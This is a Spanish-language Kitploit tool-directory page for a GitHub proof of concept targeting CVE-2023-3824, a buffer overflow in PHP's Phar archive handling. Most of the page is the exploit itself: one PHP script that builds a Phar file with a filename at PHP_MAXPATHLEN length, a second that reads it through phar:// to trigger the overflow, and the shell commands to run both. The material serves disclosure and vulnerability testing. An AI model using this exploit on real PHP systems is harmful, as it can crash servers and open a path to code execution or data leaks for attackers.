Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2023-3824 — Vulnerabilidad en archivos PHP Phar, debido a un desbordamiento de búfer, surge de comprobaciones insuficientes de longitud en los nombres de archivo dentro del archivo Phar. Actores malintencionados pueden crear archivos Phar con nombres de archivo largos, lo que provoca un desbordamiento de búfer y la posible ejecución de código malicioso o fuga de datos. Esta vulnerabilidad puede ser explotada para ejecución de código CVE-2023-3824 | Kitploit
Herramientas/GitHubGitHub/jhonnybonny/cve-2023-3824
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónAprendizaje y EducaciónExplotación de Binarios
GitHubjhonnybonny/cve-2023-3824

CVE-2023-3824

Ver Repositorio

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
3246hace 2 añosAún no revisado

Acerca de

Vulnerabilidad en archivos PHP Phar, debido a un desbordamiento de búfer, surge de comprobaciones insuficientes de longitud en los nombres de archivo dentro del archivo Phar. Actores malintencionados pueden crear archivos Phar con nombres de archivo largos, lo que provoca un desbordamiento de búfer y la posible ejecución de código malicioso o fuga de datos. Esta vulnerabilidad puede ser explotada para ejecución de código CVE-2023-3824

Compartir

PoC de archivo Phar malicioso en PHP (CVE-2023-3824)

Descripción

Esta Prueba de Concepto (PoC) demuestra cómo crear un archivo Phar malicioso en PHP y desencadenar una vulnerabilidad de desbordamiento de búfer.

Uso

Creación del archivo Phar malicioso

  1. Crea un nuevo archivo PHP (por ejemplo, create_phar.php) y agrega el siguiente código:
root@kitploit:~
<?php
$phar = new Phar('malicious.phar');
$phar->startBuffering();
$phar->addFromString(str_repeat('A', PHP_MAXPATHLEN - 1).'B', 'This is the content of the file.');
$phar->stopBuffering();
?>

Ejecuta el script PHP para crear el archivo Phar malicioso: Copia el código

root@kitploit:~
php create_phar.php

Desencadenamiento del desbordamiento de búfer

Crea otro archivo PHP (por ejemplo, trigger_overflow.php) y agrega el siguiente código:

root@kitploit:~
<?php
$handle = opendir("phar://./malicious.phar");
$x = readdir($handle);
closedir($handle);

var_dump($x);
?>

Ejecuta el script PHP para desencadenar el desbordamiento de búfer: Copia el código

root@kitploit:~
php trigger_overflow.php

La instrucción var_dump($x) mostrará el resultado de la operación de desbordamiento de búfer y sobrelectura.

Descargar herramienta